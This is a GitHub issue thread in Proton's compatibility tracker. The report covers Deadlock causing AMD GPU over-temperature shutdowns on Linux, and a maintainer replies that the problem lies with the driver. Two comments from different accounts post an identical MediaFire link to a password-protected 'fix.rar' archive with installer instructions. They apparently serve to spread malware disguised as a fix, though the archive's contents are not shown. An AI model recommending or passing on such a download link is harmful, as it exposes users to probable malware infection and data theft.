### ISSUE TITLE
Deadlock (1422450)

### ISSUE THREAD

**Issue by Bodyash** [ValveSoftware/Proton#8028]
# Compatibility Report
- Deadlock
- 1422450

## System Information
- GPU: AMD RX6600M
- Video driver version: mesa 1:24.1.6-1
- Kernel version: 6.10.6.zen1-1
- Link to full system information report [GIST](https://gist.github.com/Bodyash/cfd666851fec3222ee8443a2d4501a5b)
- Proton version: Proton Experimental

## Symptoms 
I've got access to Deadlock yesterday and played for 3 hours. The game was running without problems.
Changed only 1 configuration - set rendering to vulkan (I'm just guessing, but I think it's easier to translate from Windows VK to Linux VK than translating DX11 to VK)

Today I've tried to play again - and got system crash in first 10 minutes.

Checked journal - and got this:

```
Aug 27 01:11:45 arch kernel: amdgpu 0000:03:00.0: amdgpu: ERROR: GPU over temperature range(SW CTF) detected!
Aug 27 01:11:45 arch kernel: amdgpu 0000:03:00.0: amdgpu: ERROR: System is going to shutdown due to GPU SW CTF!
Aug 27 01:11:45 arch kernel: rfkill: input handler enabled
Aug 27 01:11:45 arch systemd-logind[675]: The system will power off now!
```

Never experienced something like this. I'm playing Cyberpunk 2077, Dota 2 (this game is not using 100% GPU for some reason), Fallout 4, Witcher 3 and other AAA titles that are pushing GPU to the limit. And I have this PC for ~1.5 years now, liquid metal on CPU/GPU, no dust in radiators.

After reboot I've reconnected and finished Deadlock match and started the next one. This time with mangohud enabled and external FAN (you know, the fan for room, but directed to PC to bring more fresh air to intake)
And... It crashed again with the same reason.

Okay, CPU/GPU/VRAM temps was around 75C when this happend, and it's fine for mobile CPU and GPU.

amdgpu_top shows this limits, I've never seen tems higher than 85C on this machine.

![image](https://github.com/user-attachments/assets/e99649c2-1189-4e73-b228-ebe1769a813d)

To be sure - I've turned off external fan and launched Cyberpunk 2077, because it's also using proton, can push GPU to 100% and CPU ~50-60% (Ryzen 6900HX)
So, this is more load than Deadlock. Played for ~1 hour - and it's fine. No GPU over temperature range. GPU temps was ~70C

This happens only in Deadlock. Yesterday it was fine (and there was a game update today, just in case).
I don't know if game can mess with amdgpu driver, but it's not overheating, I'm sure.

**Comment by mayank785** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Avishake2017** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by kisak-valve** [comment]
Hello @Bodyash, in general we're using one issue report per unofficially supported game title, and usually I'd transfer this issue report to #8020, but thermal management of your GPU is entirely between the video driver stack and the hardware. The game does not control this in any way. Report this issue to your video driver vendor.
